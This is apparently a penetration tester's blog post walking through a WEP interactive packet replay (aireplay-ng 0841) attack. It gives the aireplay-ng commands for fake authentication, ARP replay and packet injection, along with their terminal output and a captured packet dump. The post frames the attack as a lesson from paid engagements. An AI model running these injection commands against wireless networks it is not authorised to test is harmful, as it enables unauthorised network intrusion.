Aireplay 0841 Attack – aka Interactive Packet Replay

This week I wanted to cover the aireplay 0841 attack, or interactive packet replay. I know that this is yet another wireless post, but I've been on a few wireless engagements recently!

Aireplay 0841 Attack - Introduction

For those of you not familiar, interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.

If you would like some more information, then you can also read the following write-up.

Attempting ARP Replay

First, I sent a fake authentication request to the target access point.

root@kali:~# aireplay-ng -1 0 -e TargetAP -a FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
18:07:45  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11

18:07:45  Sending Authentication Request (Open System) [ACK]
18:07:45  Authentication successful
18:07:45  Sending Association Request [ACK]
18:07:45  Association successful 🙂 (AID: 1)

Next, I attempted an ARP Replay attack. Unfortunately, I received 0 ARP requests even after 205,000 packets.

root@kali:~# aireplay-ng --arpreplay -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
18:03:37  Waiting for beacon frame (BSSID: FC:5B:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-1031-180337.cap
You should also start airodump-ng to capture replies.
Read 205379 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
^C

Enter the Aireplay 0841 Attack

As an ARP Replay attack was not working, it was time to try the 0841 attack.

First, I needed to capture a packet with the "To Distribution System" flag set. Once I captured a packet, hitting the "y" key saved the packet and started to replay it on the network.

root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b FC:5B:xx:xx:xx:xx -h 00:C0:CA:8D:89:75 wlan1
For information, no action required: Using gettimeofday() instead of /dev/rtc
Read 856 packets...

        Size: 118, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  FC:5B:xx:xx:xx:xx
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  4C:34:88:2C:23:6A

        0x0000:  0842 0000 ffff ffff ffff fc5b 3969 0062  .B.........[9i.b
        0x0010:  4c34 882c 236a 3058 713d 8a80 82c7 724b  L4.,#j0Xq=....rK
        0x0020:  df97 716b 5223 a570 e093 b405 faac bde5  ..qkR#.p........
        0x0030:  74bf 43d5 8047 377f c79c cbf4 b8e3 48e3  t.C..G7......H.
        0x0040:  07e7 18f5 6ce9 b454 d6a4 1f46 acf9 81fd  ....l..T...F....
        0x0050:  b5d3 299b 55e4 6a85 cb35 cc17 2cfe ea13  ..).U.j..5..,...
        0x0060:  32d8 0f9e 8990 cb3f 2b01 1ea1 b3d0 7f64  2......?+.....d
        0x0070:  51e6 e547 06ab                           Q..G..

Use this packet ? y

Saving chosen packet in replay_src-1031-180750.cap
You should also start airodump-ng to capture replies.

Sent 27144 packets...(499 pps)

As you can see, I was now receiving data packets (albeit a bit slowly) on the network!

 CH 11 ][ Elapsed: 12 mins ][ 2017-10-31 18:10                             
                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AU
                                                                           
 FC:5B:xx:xx:xx:xx  -32   2     3412      116    0  11  54e. WEP  WEP40  OP
                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe 
                                                                           
 FC:5B:xx:xx:xx:xx  00:C0:CA:8D:89:75    0    9 - 1   4858    74695

Cracking

Unfortunately, I was unable to crack this specific key even after 50k IVs. That said, you can crack this key with aircrack the same way you would a normal WEP pcap file.

Aireplay 0841 Attack - Conclusion

While I wasn't able to crack this particular key, hopefully you were able to learn a new WEP attack.

Next week will be another non-wireless post finally, so be on the lookout!

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, eWPTX, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next (currently GXPN) or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.